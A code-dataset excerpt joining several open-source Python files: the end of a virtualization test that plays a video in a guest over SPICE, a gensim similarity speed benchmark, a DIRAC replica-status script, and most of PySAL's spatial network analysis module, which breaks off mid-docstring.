Requires: binaries Xorg, totem, gnome-session
"""
import logging
import os
from virttest import utils_misc, remote
def launch_totem(guest_session, params):
"""
    Launch the Totem player inside the guest.
    :param guest_session: guest session object
    :param params: Dictionary with the test parameters.
"""
totem_version = guest_session.cmd('totem --version')
logging.info("Totem version: %s", totem_version)
# repeat parameters for totem
logging.info("Set up video repeat to '%s' to the Totem.",
params.get("repeat_video"))
if params.get("repeat_video") == "yes":
cmd = "gconftool-2 --set /apps/totem/repeat -t bool true"
else:
cmd = "gconftool-2 --set /apps/totem/repeat -t bool false"
guest_session.cmd(cmd)
cmd = "export DISPLAY=:0.0"
guest_session.cmd(cmd)
# fullscreen parameters for totem
if params.get("fullscreen"):
fullscreen = " --fullscreen "
else:
fullscreen = ""
cmd = "nohup totem %s %s --display=:0.0 --play &> /dev/null &" \
% (fullscreen, params.get("destination_video_file_path"))
guest_session.cmd(cmd)
def deploy_video_file(test, vm_obj, params):
"""
    Deploy the video file to its destination on the vm.
    :param vm_obj: vm object
:param params: Dictionary with the test parameters.
"""
source_video_file = params.get("source_video_file")
video_dir = os.path.join("deps", source_video_file)
video_path = utils_misc.get_path(test.virtdir, video_dir)
remote.copy_files_to(vm_obj.get_address(), 'scp',
params.get("username"),
params.get("password"),
params.get("shell_port"),
video_path,
params.get("destination_video_file_path"))
def run(test, params, env):
"""
Test of video through spice
:param test: KVM test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
guest_vm = env.get_vm(params["guest_vm"])
guest_vm.verify_alive()
guest_session = guest_vm.wait_for_login(
timeout=int(params.get("login_timeout", 360)))
deploy_video_file(test, guest_vm, params)
launch_totem(guest_session, params)
guest_session.close()
| gpl-2.0 | 3,130,335,405,542,363,000 | 27.411765 | 68 | 0.615321 | false |
loisaidasam/gensim | gensim/test/simspeed2.py | 14 | 6388 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s CORPUS_DENSE.mm CORPUS_SPARSE.mm [NUMDOCS]
Run speed test of similarity queries. Only use the first NUMDOCS documents of \
each corpus for testing (or use all if no NUMDOCS is given).
The two sample corpora can be downloaded from http://nlp.fi.muni.cz/projekty/gensim/wikismall.tgz
Example: ./simspeed2.py wikismall.dense.mm wikismall.sparse.mm
"""
import logging
import sys
import itertools
import os
import math
from time import time
import numpy as np
import scipy.sparse
import gensim
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
logging.info("running %s" % " ".join(sys.argv))
# check and process cmdline input
program = os.path.basename(sys.argv[0])
if len(sys.argv) < 3:
print(globals()['__doc__'] % locals())
sys.exit(1)
corpus_dense = gensim.corpora.MmCorpus(sys.argv[1])
corpus_sparse = gensim.corpora.MmCorpus(sys.argv[2])
dense_features, sparse_features = corpus_dense.num_terms, corpus_sparse.num_terms
if len(sys.argv) > 3:
NUMDOCS = int(sys.argv[3])
corpus_dense = list(itertools.islice(corpus_dense, NUMDOCS))
corpus_sparse = list(itertools.islice(corpus_sparse, NUMDOCS))
# create the query index to be tested (one for dense input, one for sparse)
index_dense = gensim.similarities.Similarity('/tmp/tstdense', corpus_dense, dense_features)
index_sparse = gensim.similarities.Similarity('/tmp/tstsparse', corpus_sparse, sparse_features)
density = 100.0 * sum(shard.num_nnz for shard in index_sparse.shards) / (len(index_sparse) * sparse_features)
logging.info("test 1 (dense): similarity of all vs. all (%i documents, %i dense features)" %
(len(corpus_dense), index_dense.num_features))
for chunksize in [1, 8, 32, 64, 128, 256, 512, 1024, index_dense.shardsize]:
index_dense.chunksize = chunksize
start = time()
for sim in index_dense:
pass
taken = time() - start
queries = math.ceil(1.0 * len(corpus_dense) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(corpus_dense) / taken, queries / taken))
index_dense.num_best = 10
logging.info("test 2 (dense): as above, but only ask for the top-10 most similar for each document")
for chunksize in [1, 8, 32, 64, 128, 256, 512, 1024, index_dense.shardsize]:
index_dense.chunksize = chunksize
start = time()
sims = [sim for sim in index_dense]
taken = time() - start
queries = math.ceil(1.0 * len(corpus_dense) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(corpus_dense) / taken, queries / taken))
index_dense.num_best = None
logging.info("test 3 (sparse): similarity of all vs. all (%i documents, %i features, %.2f%% density)" %
(len(corpus_sparse), index_sparse.num_features, density))
for chunksize in [1, 5, 10, 100, 256, 500, 1000, index_sparse.shardsize]:
index_sparse.chunksize = chunksize
start = time()
for sim in index_sparse:
pass
taken = time() - start
queries = math.ceil(1.0 * len(corpus_sparse) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(corpus_sparse) / taken, queries / taken))
index_sparse.num_best = 10
logging.info("test 4 (sparse): as above, but only ask for the top-10 most similar for each document")
for chunksize in [1, 5, 10, 100, 256, 500, 1000, index_sparse.shardsize]:
index_sparse.chunksize = chunksize
start = time()
for sim in index_sparse:
pass
taken = time() - start
queries = math.ceil(1.0 * len(corpus_sparse) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(corpus_sparse) / taken, queries / taken))
index_sparse.num_best = None
# Difference between test #5 and test #1 is that the query in #5 is a gensim iterable
# corpus, while in #1, the index is used directly (numpy arrays). So #5 is slower,
# because it needs to convert sparse vecs to numpy arrays and normalize them to
# unit length=extra work, which #1 avoids.
query = list(itertools.islice(corpus_dense, 1000))
logging.info("test 5 (dense): dense corpus of %i docs vs. index (%i documents, %i dense features)" %
(len(query), len(index_dense), index_dense.num_features))
for chunksize in [1, 8, 32, 64, 128, 256, 512, 1024]:
start = time()
if chunksize > 1:
sims = []
for chunk in gensim.utils.chunkize_serial(query, chunksize):
_ = index_dense[chunk]
else:
for vec in query:
_ = index_dense[vec]
taken = time() - start
queries = math.ceil(1.0 * len(query) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(query) / taken, queries / taken))
# Same comment as for test #5.
query = list(itertools.islice(corpus_dense, 1000))
logging.info("test 6 (sparse): sparse corpus of %i docs vs. sparse index (%i documents, %i features, %.2f%% density)" %
(len(query), len(corpus_sparse), index_sparse.num_features, density))
for chunksize in [1, 5, 10, 100, 500, 1000]:
start = time()
if chunksize > 1:
sims = []
for chunk in gensim.utils.chunkize_serial(query, chunksize):
_ = index_sparse[chunk]
else:
for vec in query:
_ = index_sparse[vec]
taken = time() - start
queries = math.ceil(1.0 * len(query) / chunksize)
logging.info("chunksize=%i, time=%.4fs (%.2f docs/s, %.2f queries/s)" %
(chunksize, taken, len(query) / taken, queries / taken))
logging.info("finished running %s" % program)
| lgpl-2.1 | -3,182,038,977,800,247,000 | 44.304965 | 123 | 0.615842 | false |
wkrzemien/DIRAC | DataManagementSystem/scripts/dirac-dms-change-replica-status.py | 4 | 1594 | #! /usr/bin/env python
########################################################################
# $HeadURL$
########################################################################
from __future__ import print_function
__RCSID__ = "$Id$"
from DIRAC import exit as DIRACExit
from DIRAC.Core.Base import Script
Script.setUsageMessage("""
Change status of replica of a given file or a list of files at a given Storage Element
Usage:
%s <lfn | fileContainingLfns> <SE> <status>
""" % Script.scriptName)
Script.parseCommandLine()
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
catalog = FileCatalog()
import os
args = Script.getPositionalArgs()
if not len(args) == 3:
Script.showHelp()
DIRACExit( -1 )
else:
inputFileName = args[0]
se = args[1]
newStatus = args[2]
if os.path.exists(inputFileName):
inputFile = open(inputFileName,'r')
string = inputFile.read()
lfns = string.splitlines()
inputFile.close()
else:
lfns = [inputFileName]
res = catalog.getReplicas( lfns, True )
if not res['OK']:
print(res['Message'])
DIRACExit( -1 )
replicas = res['Value']['Successful']
lfnDict = {}
for lfn in lfns:
lfnDict[lfn] = {}
lfnDict[lfn]['SE'] = se
lfnDict[lfn]['Status'] = newStatus
lfnDict[lfn]['PFN'] = replicas[lfn][se]
res = catalog.setReplicaStatus( lfnDict )
if not res['OK']:
print("ERROR:", res['Message'])
if res['Value']['Failed']:
print("Failed to update %d replica status" % len(res['Value']['Failed']))
if res['Value']['Successful']:
print("Successfully updated %d replica status" % len(res['Value']['Successful']))
| gpl-3.0 | 2,460,868,614,277,936,600 | 26.016949 | 87 | 0.61857 | false |
TaylorOshan/pysal | pysal/network/network.py | 5 | 42024 | from collections import defaultdict, OrderedDict
import math
import os
import cPickle
import copy
import numpy as np
import pysal as ps
from pysal.weights.util import get_ids
from analysis import NetworkG, NetworkK, NetworkF
import util
__all__ = ["Network", "PointPattern", "NetworkG", "NetworkK", "NetworkF"]
class Network:
"""
Spatially constrained network representation and analytical functionality.
Parameters
-----------
in_shp: str
The input shapefile. This must be in .shp format.
node_sig: int
Round the x and y coordinates of all nodes to node_sig significant
digits (combined significant digits on the left and right
of the decimal place)
-- Default is 11
-- Set to None for no rounding
unique_segs: bool
If True (default), keep only unique segments (i.e., prune out any
duplicated segments).
If False keep all segments.
Attributes
----------
in_shp: str
The input shapefile. This must be in .shp format.
adjacencylist: list
List of lists storing node adjacency.
nodes: dict
Keys are tuples of node coords and values are the node ID.
edge_lengths: dict
Keys are tuples of sorted node IDs representing an edge and values are
the length.
pointpatterns: dict
Keys are a string name of the pattern and values are point pattern
class instances.
node_coords: dict
Keys are the node ID and values are the (x,y) coordinates inverse
to nodes.
edges: list
List of edges, where each edge is a sorted tuple of node IDs.
node_list: list
List of node IDs.
alldistances: dict
Keys are the node IDs.
Values are tuples with two elements:
1. A list of the shortest path distances
2. A dict with the key being the id of the destination node and
the value being a list of the shortest path.
Examples
--------
Instantiate an instance of a network.
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
Snap point observations to the network with attribute information.
>>> ntw.snapobservations(ps.examples.get_path('crimes.shp'), 'crimes', attribute=True)
And without attribute information.
>>> ntw.snapobservations(ps.examples.get_path('schools.shp'), 'schools', attribute=False)
"""
def __init__(self, in_shp=None, node_sig=11, unique_segs=True):
if in_shp:
self.in_shp = in_shp
self.node_sig = node_sig
self.unique_segs = unique_segs
self.adjacencylist = defaultdict(list)
self.nodes = {}
self.edge_lengths = {}
self.edges = []
self.pointpatterns = {}
self._extractnetwork()
self.node_coords = dict((value, key) for key, value in self.nodes.iteritems())
# This is a spatial representation of the network.
self.edges = sorted(self.edges)
# Extract the graph.
self.extractgraph()
self.node_list = sorted(self.nodes.values())
def _round_sig(self, v):
"""
Used internally to round the vertex to a set number of significant digits. If sig
is set to 4, then the following are some possible results for a coordinate:
0.0xxxx, 0.xxxx, x.xxx, xx.xx, xxx.x, xxxx.0, xxxx0.0
"""
sig = self.node_sig
if sig is None:
return v
        out_v = [val if val == 0 else
                 round(val, -int(math.floor(math.log10(math.fabs(val)))) + (sig - 1))
                 for val in v]
return tuple(out_v)
def _extractnetwork(self):
"""
Used internally, to extract a network from a polyline shapefile.
"""
nodecount = 0
shps = ps.open(self.in_shp)
for shp in shps:
vertices = shp.vertices
for i, v in enumerate(vertices[:-1]):
v = self._round_sig(v)
try:
vid = self.nodes[v]
except:
self.nodes[v] = vid = nodecount
nodecount += 1
v2 = self._round_sig(vertices[i+1])
try:
nvid = self.nodes[v2]
except:
self.nodes[v2] = nvid = nodecount
nodecount += 1
self.adjacencylist[vid].append(nvid)
self.adjacencylist[nvid].append(vid)
# Sort the edges so that mono-directional keys can be stored.
edgenodes = sorted([vid, nvid])
edge = tuple(edgenodes)
self.edges.append(edge)
length = util.compute_length(v, vertices[i+1])
self.edge_lengths[edge] = length
if self.unique_segs == True:
# Remove duplicate edges and duplicate adjacent nodes.
self.edges = list(set(self.edges))
for k, v in self.adjacencylist.iteritems():
self.adjacencylist[k] = list(set(v))
def extractgraph(self):
"""
Using the existing network representation, create a graph based representation by
removing all nodes with a neighbor incidence of two. That is, we assume these
nodes are bridges between nodes with higher incidence.
"""
self.graphedges = []
self.edge_to_graph = {}
self.graph_lengths = {}
# Find all nodes with cardinality 2.
segment_nodes = []
for k, v in self.adjacencylist.iteritems():
#len(v) == 1 #cul-de-sac
#len(v) == 2 #bridge segment
#len(v) > 2 #intersection
if len(v) == 2:
segment_nodes.append(k)
# Start with a copy of the spatial representation and iteratively remove edges
# deemed to be segments.
self.graphedges = copy.deepcopy(self.edges)
self.graph_lengths = copy.deepcopy(self.edge_lengths)
# Mapping all the edges contained within a single graph represented edge.
self.graph_to_edges = {}
bridges = []
for s in segment_nodes:
bridge = [s]
neighbors = self._yieldneighbor(s, segment_nodes, bridge)
while neighbors:
cnode = neighbors.pop()
segment_nodes.remove(cnode)
bridge.append(cnode)
newneighbors = self._yieldneighbor(cnode, segment_nodes, bridge)
neighbors += newneighbors
bridges.append(bridge)
for bridge in bridges:
if len(bridge) == 1:
n = self.adjacencylist[bridge[0]]
newedge = tuple(sorted([n[0], n[1]]))
# Identify the edges to be removed.
e1 = tuple(sorted([bridge[0], n[0]]))
e2 = tuple(sorted([bridge[0], n[1]]))
# Remove them from the graph.
self.graphedges.remove(e1)
self.graphedges.remove(e2)
# Remove from the edge lengths.
length_e1 = self.edge_lengths[e1]
length_e2 = self.edge_lengths[e2]
self.graph_lengths.pop(e1, None)
self.graph_lengths.pop(e2, None)
self.graph_lengths[newedge] = length_e1 + length_e2
# Update the pointers.
self.graph_to_edges[e1] = newedge
self.graph_to_edges[e2] = newedge
else:
cumulative_length = 0
startend = {}
redundant = set([])
for b in bridge:
for n in self.adjacencylist[b]:
if n not in bridge:
startend[b] = n
else:
redundant.add(tuple(sorted([b,n])))
newedge = tuple(sorted(startend.values()))
for k, v in startend.iteritems():
redundant.add(tuple(sorted([k,v])))
for r in redundant:
self.graphedges.remove(r)
cumulative_length += self.edge_lengths[r]
self.graph_lengths.pop(r, None)
self.graph_to_edges[r] = newedge
self.graph_lengths[newedge] = cumulative_length
self.graphedges.append(newedge)
self.graphedges = sorted(self.graphedges)
def _yieldneighbor(self, node, segment_nodes, bridge):
"""
Used internally, this method traverses a bridge segement to find the source and
destination nodes.
"""
n = []
for i in self.adjacencylist[node]:
if i in segment_nodes and i not in bridge:
n.append(i)
return n
def contiguityweights(self, graph=True, weightings=None):
"""
Create a contiguity based W object
Parameters
----------
graph: bool
{True, False} controls whether the W is generated using the spatial
representation or the graph representation.
weightings: dict
Dict of lists of weightings for each edge.
Returns
-------
W: object
A PySAL W Object representing the binary adjacency of the network.
Examples
--------
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> w = ntw.contiguityweights(graph=False)
>>> ntw.snapobservations(ps.examples.get_path('crimes.shp'), 'crimes', attribute=True)
>>> counts = ntw.count_per_edge(ntw.pointpatterns['crimes'].obs_to_edge, graph=False)
Using the W object, access to ESDA functionality is provided. First,
a vector of attributes is created for all edges with observations.
>>> w = ntw.contiguityweights(graph=False)
>>> edges = w.neighbors.keys()
>>> y = np.zeros(len(edges))
>>> for i, e in enumerate(edges):
... if e in counts.keys():
... y[i] = counts[e]
Next, a standard call ot Moran is made and the result placed into `res`
>>> res = ps.esda.moran.Moran(y, w, permutations=99)
"""
        neighbors = OrderedDict()
if graph:
edges = self.graphedges
else:
edges = self.edges
if weightings:
weights = {}
else:
weights = None
for key in edges:
neighbors[key] = []
if weightings:
weights[key] = []
for neigh in edges:
if key == neigh:
continue
if key[0] == neigh[0] or key[0] == neigh[1] or key[1] == neigh[0]\
or key[1] == neigh[1]:
neighbors[key].append(neigh)
if weightings:
weights[key].append(weightings[neigh])
# TODO: Add a break condition - everything is sorted, so we know when we
# have stepped beyond a possible neighbor.
#if key[1] > neigh[1]: #NOT THIS
#break
return ps.weights.W(neighbors, weights=weights)
def distancebandweights(self, threshold):
"""
Create distance based weights
Parameters
----------
threshold: float
Distance threshold value.
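        Returns
        -------
        W: object
            A PySAL W Object representing binary adjacency within the given
            network distance threshold.
        Examples
        --------
        A minimal usage sketch; the threshold of 500 is an arbitrary value in
        the distance units of the input shapefile, chosen only for
        illustration.
        >>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
        >>> w = ntw.distancebandweights(threshold=500)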
"""
        if not hasattr(self, 'alldistances'):
            self.node_distance_matrix()
neighbor_query = np.where(self.distancematrix < threshold)
neighbors = defaultdict(list)
for i, n in enumerate(neighbor_query[0]):
neigh = neighbor_query[1][i]
if n != neigh:
neighbors[n].append(neighbor_query[1][i])
return ps.weights.W(neighbors)
def snapobservations(self, shapefile, name, idvariable=None, attribute=None):
"""
Snap a point pattern shapefile to this network object. The point pattern is
stored in the network.pointpattern['key'] attribute of the network object.
Parameters
----------
shapefile: str
The path to the shapefile.
name: str
Name to be assigned to the point dataset.
idvariable: str
Column name to be used as ID variable.
attribute: bool
Defines whether attributes should be extracted.
True for attribute extraction.
            False for no attribute extraction.
        Returns
        -------
        None
            The snapped point pattern is stored in self.pointpatterns[name].
        """
self.pointpatterns[name] = PointPattern(shapefile, idvariable=idvariable, attribute=attribute)
self._snap_to_edge(self.pointpatterns[name])
def compute_distance_to_nodes(self, x, y, edge):
"""
Given an observation on a network edge, return the distance to the two nodes that
bound that end.
Parameters
----------
x: float
x-coordinate of the snapped point.
y: float
y-coordiante of the snapped point.
edge: tuple
(node0, node1) representation of the network edge.
Returns
-------
d1: float
The distance to node0.
- always the node with the lesser id
d2: float
The distance to node1.
- always the node with the greater id
"""
d1 = util.compute_length((x,y), self.node_coords[edge[0]])
d2 = util.compute_length((x,y), self.node_coords[edge[1]])
return d1, d2
def _snap_to_edge(self, pointpattern):
"""
Used internally to snap point observations to network edges.
Parameters
-----------
pointpattern: object
PySAL Point Pattern Object
Returns
-------
obs_to_edge: dict
Dict with edges as keys and lists of points as values.
edge_to_obs: dict
Dict with point ids as keys and edge tuples as values.
dist_to_node: dict
Dict with point ids as keys and values as dicts with keys for
node ids and values as distances from point to node.
"""
obs_to_edge = {}
dist_to_node = {}
pointpattern.snapped_coordinates = {}
segments = []
s2e = {}
for edge in self.edges:
head = self.node_coords[edge[0]]
tail = self.node_coords[edge[1]]
segments.append(ps.cg.Chain([head,tail]))
s2e[(head,tail)] = edge
points = {}
p2id = {}
for pointIdx, point in pointpattern.points.iteritems():
points[pointIdx] = point['coordinates']
snapped = util.snapPointsOnSegments(points, segments)
for pointIdx, snapInfo in snapped.iteritems():
x,y = snapInfo[1].tolist()
edge = s2e[tuple(snapInfo[0])]
if edge not in obs_to_edge:
obs_to_edge[edge] = {}
obs_to_edge[edge][pointIdx] = (x,y)
pointpattern.snapped_coordinates[pointIdx] = (x,y)
d1,d2 = self.compute_distance_to_nodes(x, y, edge)
dist_to_node[pointIdx] = {edge[0]:d1, edge[1]:d2}
obs_to_node = defaultdict(list)
for k, v in obs_to_edge.iteritems():
keys = v.keys()
obs_to_node[k[0]] = keys
obs_to_node[k[1]] = keys
pointpattern.obs_to_edge = obs_to_edge
pointpattern.dist_to_node = dist_to_node
pointpattern.obs_to_node = obs_to_node
def count_per_edge(self, obs_on_network, graph=True):
"""
Compute the counts per edge.
Parameters
----------
obs_on_network: dict
Dict of observations on the network.
{(edge):{pt_id:(coords)}} or {edge:[(coord),(coord),(coord)]}
Returns
-------
counts: dict
{(edge):count}
Example
-------
Note that this passes the obs_to_edge attribute of a point pattern snapped to the
network.
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> ntw.snapobservations(ps.examples.get_path('crimes.shp'), 'crimes', attribute=True)
>>> counts = ntw.count_per_edge(ntw.pointpatterns['crimes'].obs_to_edge,graph=False)
>>> s = sum([v for v in counts.itervalues()])
>>> s
287
"""
counts = {}
if graph:
for key, observations in obs_on_network.iteritems():
cnt = len(observations)
if key in self.graph_to_edges.keys():
key = self.graph_to_edges[key]
try:
counts[key] += cnt
except:
counts[key] = cnt
else:
for key in obs_on_network.iterkeys():
counts[key] = len(obs_on_network[key])
return counts
def _newpoint_coords(self, edge, distance):
"""
Used internally to compute new point coordinates during snapping.
"""
x1 = self.node_coords[edge[0]][0]
y1 = self.node_coords[edge[0]][1]
x2 = self.node_coords[edge[1]][0]
y2 = self.node_coords[edge[1]][1]
if x1 == x2: # Vertical line case
x0 = x1
if y1 < y2:
y0 = y1 + distance
elif y1 > y2:
y0 = y2 + distance
else: # Zero length edge
y0 = y1
return x0, y0
m = (y2 - y1) / (x2 - x1)
if x1 > x2:
x0 = x1 - distance / math.sqrt(1 + m**2)
elif x1 < x2:
x0 = x1 + distance / math.sqrt(1 + m**2)
y0 = m * (x0 - x1) + y1
return x0, y0
def simulate_observations(self, count, distribution='uniform'):
"""
Generate a simulated point pattern on the network.
Parameters
----------
count: int
The number of points to create or mean of the distribution if not
'uniform'.
distribution: str
{'uniform', 'poisson'} distribution of random points.
Returns
-------
random_pts: dict
Keys are the edge tuple.
Value are a list of new point coordinates.
Example
-------
>>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
>>> ntw.snapobservations(ps.examples.get_path('crimes.shp'), 'crimes', attribute=True)
>>> npts = ntw.pointpatterns['crimes'].npoints
>>> sim = ntw.simulate_observations(npts)
>>> isinstance(sim, ps.network.network.SimulatedPointPattern)
True
"""
simpts = SimulatedPointPattern()
# Cumulative Network Length.
edges = []
lengths = np.zeros(len(self.edge_lengths))
for i, key in enumerate(self.edge_lengths.iterkeys()):
edges.append(key)
lengths[i] = self.edge_lengths[key]
stops = np.cumsum(lengths)
totallength = stops[-1]
if distribution is 'uniform':
nrandompts = np.random.uniform(0, totallength, size=(count,))
elif distribution is 'poisson':
nrandompts = np.random.uniform(0, totallength, size=(np.random.poisson(count),))
for i, r in enumerate(nrandompts):
idx = np.where(r < stops)[0][0]
assignment_edge = edges[idx]
distance_from_start = stops[idx] - r
# Populate the coordinates dict.
x0, y0 = self._newpoint_coords(assignment_edge, distance_from_start)
simpts.snapped_coordinates[i] = (x0, y0)
simpts.obs_to_node[assignment_edge[0]].append(i)
simpts.obs_to_node[assignment_edge[1]].append(i)
# Populate the distance to node.
simpts.dist_to_node[i] = {assignment_edge[0] : distance_from_start,
assignment_edge[1] : self.edge_lengths[edges[idx]] - distance_from_start}
simpts.points = simpts.snapped_coordinates
simpts.npoints = len(simpts.points)
return simpts
def enum_links_node(self, v0):
"""
Returns the edges (links) around node
Parameters
-----------
v0: int
Node id
Returns
-------
links: list
List of tuple edges adjacent to the node.
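        Examples
        --------
        A small sketch; node 0 is an arbitrary choice of node id.
        >>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
        >>> links = ntw.enum_links_node(0)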
"""
links = []
neighbornodes = self.adjacencylist[v0]
for n in neighbornodes:
links.append(tuple(sorted([n, v0])))
return links
def node_distance_matrix(self):
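        """
        Compute the shortest network path distance from every node to every
        other node, caching per-node results in self.alldistances and the
        full matrix in self.distancematrix.
        """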
self.alldistances = {}
nnodes = len(self.node_list)
self.distancematrix = np.empty((nnodes, nnodes))
for node in self.node_list:
distance, pred = util.dijkstra(self, self.edge_lengths, node, n=float('inf'))
pred = np.array(pred)
#tree = util.generatetree(pred) <---- something to look at in the future
tree = None
self.alldistances[node] = (distance, tree)
self.distancematrix[node] = distance
def allneighbordistances(self, sourcepattern, destpattern=None, fill_diagonal=None):
"""
Compute either all distances between i and j in a single point pattern or all
distances between each i from a source pattern and all j from a destination pattern.
Parameters
----------
        sourcepattern: object
            A point pattern snapped to the network (e.g. an entry from
            self.pointpatterns).
        destpattern: object
            (Optional) A second snapped point pattern; defaults to the
            source pattern, giving intra-pattern distances.
        fill_diagonal: float, int
            (Optional) Fill the diagonal of the cost matrix.
            Default is None, which populates the diagonal with numpy.nan.
            Do not declare a destpattern for a custom fill_diagonal.
Returns
-------
nearest: array (n,n)
An array of shape (n,n) storing distances between all points.
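        Examples
        --------
        A minimal sketch, passing the snapped point pattern object itself:
        >>> ntw = ps.Network(ps.examples.get_path('streets.shp'))
        >>> ntw.snapobservations(ps.examples.get_path('crimes.shp'), 'crimes', attribute=True)
        >>> costs = ntw.allneighbordistances(ntw.pointpatterns['crimes'])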
"""
if not hasattr(self,'alldistances'):
self.node_distance_matrix()
# Source setup
src_indices = sourcepattern.points.keys()
nsource_pts = len(src_indices)
src_dist_to_node = sourcepattern.dist_to_node
src_nodes = {}
for s in src_indices:
e1, e2 = src_dist_to_node[s].keys()
src_nodes[s] = (e1, e2)
# Destination setup
symmetric = False
if destpattern is None:
symmetric = True
destpattern = sourcepattern
dest_indices = destpattern.points.keys()
ndest_pts = len(dest_indices)
dest_dist_to_node = destpattern.dist_to_node
dest_searchpts = copy.deepcopy(dest_indices)
dest_nodes = {}
for s in dest_indices:
e1, e2 = dest_dist_to_node[s].keys()
dest_nodes[s] = (e1, e2)
# Output setup
nearest = np.empty((nsource_pts, ndest_pts))
nearest[:] = np.inf
for p1 in src_indices:
# Get the source nodes and dist to source nodes.
source1, source2 = src_nodes[p1]
set1 = set(src_nodes[p1])
# Distance from node1 to p, distance from node2 to p.
sdist1, sdist2 = src_dist_to_node[p1].values()
if symmetric:
# Only compute the upper triangle if symmetric.
dest_searchpts.remove(p1)
for p2 in dest_searchpts:
dest1, dest2 = dest_nodes[p2]
set2 = set(dest_nodes[p2])
if set1 == set2: # same edge
x1,y1 = sourcepattern.snapped_coordinates[p1]
x2,y2 = destpattern.snapped_coordinates[p2]
xd = x1-x2
yd = y1-y2
nearest[p1,p2] = np.sqrt(xd*xd + yd*yd)
else:
ddist1, ddist2 = dest_dist_to_node[p2].values()
d11 = self.alldistances[source1][0][dest1]
d21 = self.alldistances[source2][0][dest1]
d12 = self.alldistances[source1][0][dest2]
d22 = self.alldistances[source2][0][dest2]
# Find the shortest distance from the path passing through each of the
# two origin nodes to the first destination node.
sd_1 = d11 + sdist1
sd_21 = d21 + sdist2
if sd_1 > sd_21:
sd_1 = sd_21
# Now add the point to node one distance on the destination edge.
len_1 = sd_1 + ddist1
# Repeat the prior but now for the paths entering at the second node
# of the second edge.
sd_2 = d12 + sdist1
sd_22 = d22 + sdist2
b = 0
if sd_2 > sd_22:
sd_2 = sd_22
b = 1
len_2 = sd_2 + ddist2
# Now find the shortest distance path between point 1 on edge 1 and
# point 2 on edge 2, and assign.
sp_12 = len_1
if len_1 > len_2:
sp_12 = len_2
nearest[p1, p2] = sp_12
if symmetric:
# Mirror the upper and lower triangle when symmetric.
nearest[p2,p1] = nearest[p1,p2]
# Populate the main diagonal when symmetric.
if symmetric:
if fill_diagonal == None:
np.fill_diagonal(nearest, np.nan)
else:
np.fill_diagonal(nearest, fill_diagonal)
return nearest
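    # A minimal usage sketch (assumes 'crimes' was snapped via snapobservations(),
    # so the snapped PointPattern object is available under ntw.pointpatterns['crimes']):
    #   pp = ntw.pointpatterns['crimes']
    #   dists = ntw.allneighbordistances(pp)
    #   dists.shape   # (pp.npoints, pp.npoints), diagonal filled with numpy.nan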
def nearestneighbordistances(self, sourcepattern, destpattern=None):
"""
Compute the interpattern nearest neighbor distances or the intrapattern
nearest neighbor distances between a source pattern and a destination pattern.
Parameters
----------
sourcepattern: str
The key of a point pattern snapped to the network.
destpattern: str
(Optional) The key of a point pattern snapped to the network.
Returns
-------
nearest: ndarray (n,2)
With column[:,0] containing the id of the nearest neighbor and
column [:,1] containing the distance.
"""
if not sourcepattern in self.pointpatterns.keys():
raise KeyError("Available point patterns are {}".format(self.pointpatterns.keys()))
if not hasattr(self,'alldistances'):
self.node_distance_matrix()
pt_indices = self.pointpatterns[sourcepattern].points.keys()
dist_to_node = self.pointpatterns[sourcepattern].dist_to_node
nearest = np.zeros((len(pt_indices), 2), dtype=np.float32)
nearest[:,1] = np.inf
if destpattern == None:
destpattern = sourcepattern
searchpts = copy.deepcopy(pt_indices)
searchnodes = {}
for s in searchpts:
e1, e2 = dist_to_node[s].keys()
searchnodes[s] = (e1, e2)
for p1 in pt_indices:
# Get the source nodes and dist to source nodes.
source1, source2 = searchnodes[p1]
sdist1, sdist2 = dist_to_node[p1].values()
searchpts.remove(p1)
for p2 in searchpts:
dest1, dest2 = searchnodes[p2]
ddist1, ddist2 = dist_to_node[p2].values()
source1_to_dest1 = sdist1 + self.alldistances[source1][0][dest1] + ddist1
source1_to_dest2 = sdist1 + self.alldistances[source1][0][dest2] + ddist2
source2_to_dest1 = sdist2 + self.alldistances[source2][0][dest1] + ddist1
source2_to_dest2 = sdist2 + self.alldistances[source2][0][dest2] + ddist2
if source1_to_dest1 < nearest[p1, 1]:
nearest[p1, 0] = p2
nearest[p1, 1] = source1_to_dest1
if source1_to_dest1 < nearest[p2, 1]:
nearest[p2, 0] = p1
nearest[p2, 1] = source1_to_dest1
if source1_to_dest2 < nearest[p1, 1]:
nearest[p1, 0] = p2
nearest[p1, 1] = source1_to_dest2
                if source1_to_dest2 < nearest[p2, 1]:
nearest[p2, 0] = p1
nearest[p2, 1] = source1_to_dest2
if source2_to_dest1 < nearest[p1, 1]:
nearest[p1, 0] = p2
nearest[p1, 1] = source2_to_dest1
if source2_to_dest1 < nearest[p2, 1]:
nearest[p2, 0] = p1
nearest[p2, 1] = source2_to_dest1
if source2_to_dest2 < nearest[p1, 1]:
nearest[p1, 0] = p2
nearest[p1, 1] = source2_to_dest2
if source2_to_dest2 < nearest[p2, 1]:
nearest[p2, 0] = p1
nearest[p2, 1] = source2_to_dest2
return nearest
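    # A minimal usage sketch (note this method takes the pattern *key*, unlike
    # allneighbordistances above, which takes the snapped PointPattern object):
    #   nn = ntw.nearestneighbordistances('crimes')
    #   nn[0]   # [id of the nearest neighbour of point 0, network distance to it]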
def NetworkF(self, pointpattern, nsteps=10, permutations=99,
threshold=0.2, distribution='uniform',
lowerbound=None, upperbound=None):
"""
